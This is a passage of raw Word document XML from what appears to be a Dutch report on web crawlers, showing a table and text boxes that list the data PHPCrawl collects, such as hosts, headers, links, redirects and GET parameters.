    <w:p w14:paraId="469AD36F" w14:textId="5AFCC108" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00345CBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345CBE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="2835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A94F94" w:rsidRPr="00345CBE" w14:paraId="386071D6" w14:textId="77777777" w:rsidTr="00777731">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CAE227D" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Categorie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6DF517" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94F94" w:rsidRPr="00345CBE" w14:paraId="715900BA" w14:textId="77777777" w:rsidTr="00777731">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66FBE998" w14:textId="025FC223" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00BF64F6">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="693D57AA" w14:textId="29F433B7" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00A9437E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Algemene</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>informatie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94F94" w:rsidRPr="00345CBE" w14:paraId="3DCB5A83" w14:textId="77777777" w:rsidTr="00777731">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D9D1FC7" w14:textId="53344E46" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
            <w:r w:rsidR="00BF64F6" w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>/Meta Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FD8DE0B" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94F94" w:rsidRPr="00345CBE" w14:paraId="63333B1B" w14:textId="77777777" w:rsidTr="00777731">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5C19A6" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Data/Meta Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1150C8C7" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A94F94" w:rsidRPr="00345CBE" w14:paraId="025DCC8B" w14:textId="77777777" w:rsidTr="00777731">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6F5938" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DBE8E17" w14:textId="77777777" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00A94F94" w:rsidP="00777731">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="225233D2" w14:textId="0ED6274D" w:rsidR="00A94F94" w:rsidRPr="00345CBE" w:rsidRDefault="00F84913" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Tabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D824FA3" w14:textId="368448AE" w:rsidR="000F2B81" w:rsidRPr="009B306D" w:rsidRDefault="000F2B81" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251749376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D3B45C9" wp14:editId="36C20326">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3044190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1289685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2514600" cy="16002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514600" cy="1600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FFA87D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="000F2B81">
                            <w:pPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Hyperlinks</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="29EF9B87" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>URL (Glossary, URL)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="682E54E5" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="18"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Refererende URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="547BC0A3" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="18"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Redirect</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> (Glossary, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>redirect</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A9A1930" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="18"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Diepte in de sitemap</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="74C51675" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="18"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Parameters (GET)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="13E5265B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4B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B45C9" id="Text Box 4" o:spid="_x0000_s1090" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:239.7pt;margin-top:101.55pt;width:198pt;height:126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zZU3cCAABiBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIWxXYKlLUFTFNQoCA&#10;iWfXsdtots+zr026v35nJykd2wvTXpLz3e++Py4uW2vYToVYgyv5+GTEmXISqtqtS/7t6frDR84i&#10;ClcJA06VfK8iv5y/f3fR+JmawAZMpQIjIy7OGl/yDaKfFUWUG2VFPAGvHAk1BCuQnmFdVEE0ZN2a&#10;YjIanRUNhMoHkCpG4l51Qj7P9rVWEu+0jgqZKTnFhvkb8neVvsX8QszWQfhNLfswxD9EYUXtyOnB&#10;1JVAwbah/sOUrWWACBpPJNgCtK6lyjlQNuPRq2weN8KrnAsVJ/pDmeL/Mytvd/eB1VXJp5w5YalF&#10;T6pF9hlaNk3VaXycEejREwxbYlOXB34kZkq61cGmP6XDSE513h9qm4xJYk5Ox9OzEYkkycZEUfeS&#10;neJF3YeIXxRYloiSB2perqnY3UTsoAMkeXNwXRuTG2jcbwyy2XFUnoBeO2XSRZwp3BuVtIx7UJoq&#10;kANPjDx7amkC2wmaGiGlcphzznYJnVCafL9Fsccn1S6qtygfNLJncHhQtrWDkKv0Kuzq+xCy7vBU&#10;6qO8E4ntqs2tPz0fOrqCak+NDtAtSvTyuqZm3IiI9yLQZlADadvxjj7aQFNy6CnONhB+/o2f8DSw&#10;JOWsoU0refyxFUFxZr46GuVP4+k0rWZ+TE/PJ/QIx5LVscRt7RKoLWO6K15mMuHRDKQOYJ/pKCyS&#10;VxIJJ8l3yXEgl9jtPx0VqRaLDKJl9AJv3KOXyXQqcxq1p/ZZBN/PI9Io38Kwk2L2aiw7bNJ0sNgi&#10;6DrPbCp0V9W+AbTIeer7o5MuxfE7o15O4/wXAAAA//8DAFBLAwQUAAYACAAAACEA/8oaON8AAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPTU/DMAyG70j7D5EncWNJR8u2rumEQFxBjA+JW9Z4bbXG&#10;qZpsLf8ec4Kj/T56/bjYTa4TFxxC60lDslAgkCpvW6o1vL893axBhGjIms4TavjGALtydlWY3PqR&#10;XvGyj7XgEgq50dDE2OdShqpBZ8LC90icHf3gTORxqKUdzMjlrpNLpe6kMy3xhcb0+NBgddqfnYaP&#10;5+PXZ6pe6keX9aOflCS3kVpfz6f7LYiIU/yD4Vef1aFkp4M/kw2i05CuNimjGpbqNgHBxHqV8ebA&#10;UZYlIMtC/v+h/AEAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAA&#10;AAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC3fNlTdwIAAGIFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD/yho43wAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAM8EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4BFFA87D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="000F2B81">
                      <w:pPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Hyperlinks</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="29EF9B87" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="17"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>URL (Glossary, URL)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="682E54E5" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="18"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Refererende URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="547BC0A3" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="18"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Redirect</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> (Glossary, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>redirect</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A9A1930" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="18"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Diepte in de sitemap</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="74C51675" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="18"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Parameters (GET)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="13E5265B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251748352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67EA72D8" wp14:editId="44E6CA8C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>111760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1287145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2442845" cy="160274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442845" cy="1602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F5065B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="000F2B81">
                            <w:pPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Algemene informatie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="460182BC" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Host (Glossary, host)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4301508C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Server</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="247BD411" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Status code/protocol</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D835569" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Content lengte</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="727070B0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Connectie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D797D3D" w14:textId="62FCDC5F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="17"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2256"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:t>Content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A72D8" id="Text Box 3" o:spid="_x0000_s1091" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8.8pt;margin-top:101.35pt;width:192.35pt;height:126.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LJln0CAABiBQAADgAAAGRycy9lMm9Eb2MueG1srFRRTxsxDH6ftP8Q5X1cWwp0FVfUgZgmIUCD&#10;iec0l9DTkjhL3N51v35O7q50bC9Me7lz7M+O/dnO+UVrDduqEGtwJR8fjThTTkJVu+eSf3u8/jDj&#10;LKJwlTDgVMl3KvKLxft3542fqwmswVQqMAri4rzxJV8j+nlRRLlWVsQj8MqRUUOwAukYnosqiIai&#10;W1NMRqPTooFQ+QBSxUjaq87IFzm+1krindZRITMlp9wwf0P+rtK3WJyL+XMQfl3LPg3xD1lYUTu6&#10;dB/qSqBgm1D/EcrWMkAEjUcSbAFa11LlGqia8ehVNQ9r4VWuhciJfk9T/H9h5e32PrC6KvkxZ05Y&#10;atGjapF9gpYdJ3YaH+cEevAEw5bU1OVBH0mZim51sOlP5TCyE8+7PbcpmCTlZDqdzKYnnEmyjU9H&#10;k7NpZr94cfch4mcFliWh5IGalzkV25uIlApBB0i6zcF1bUxuoHG/KQjYaVSegN47VdJlnCXcGZW8&#10;jPuqNDGQE0+KPHvq0gS2FTQ1QkrlMNec4xI6oTTd/RbHHp9cu6ze4rz3yDeDw72zrR2EzNKrtKvv&#10;Q8q6wxN/B3UnEdtVm1t/Mhs6uoJqR40O0C1K9PK6pmbciIj3ItBmUG9p2/GOPtpAU3LoJc7WEH7+&#10;TZ/wNLBk5ayhTSt5/LERQXFmvjga5Y/jKY0Cw3yYnpxN6BAOLatDi9vYS6C2jOld8TKLCY9mEHUA&#10;+0SPwjLdSibhJN1dchzES+z2nx4VqZbLDKJl9AJv3IOXKXSiOY3aY/skgu/nEWmUb2HYSTF/NZYd&#10;Nnk6WG4QdJ1nNhHdsdo3gBY5j3L/6KSX4vCcUS9P4+IXAAAA//8DAFBLAwQUAAYACAAAACEAAmJN&#10;xN4AAAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPTU/DMAyG70j8h8hI3Fiysu6jNJ0QiCtoAybt&#10;ljVeW9E4VZOt5d/PO8HNr/zo9eN8PbpWnLEPjScN04kCgVR621Cl4evz7WEJIkRD1rSeUMMvBlgX&#10;tze5yawfaIPnbawEl1DIjIY6xi6TMpQ1OhMmvkPi3dH3zkSOfSVtbwYud61MlJpLZxriC7Xp8KXG&#10;8md7chq+34/73Ux9VK8u7QY/KkluJbW+vxufn0BEHOMfDFd9VoeCnQ7+RDaIlvNizqSGRCULEAzM&#10;VPII4sBDmk5BFrn8/0JxAQAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEZCyZZ9AgAAYgUA&#10;AA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAJiTcTeAAAA&#10;CgEAAA8AAAAAAAAAAAAAAAAA1QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0FF5065B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="000F2B81">
                      <w:pPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2256"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:t>Algemene informatie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="460182BC" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
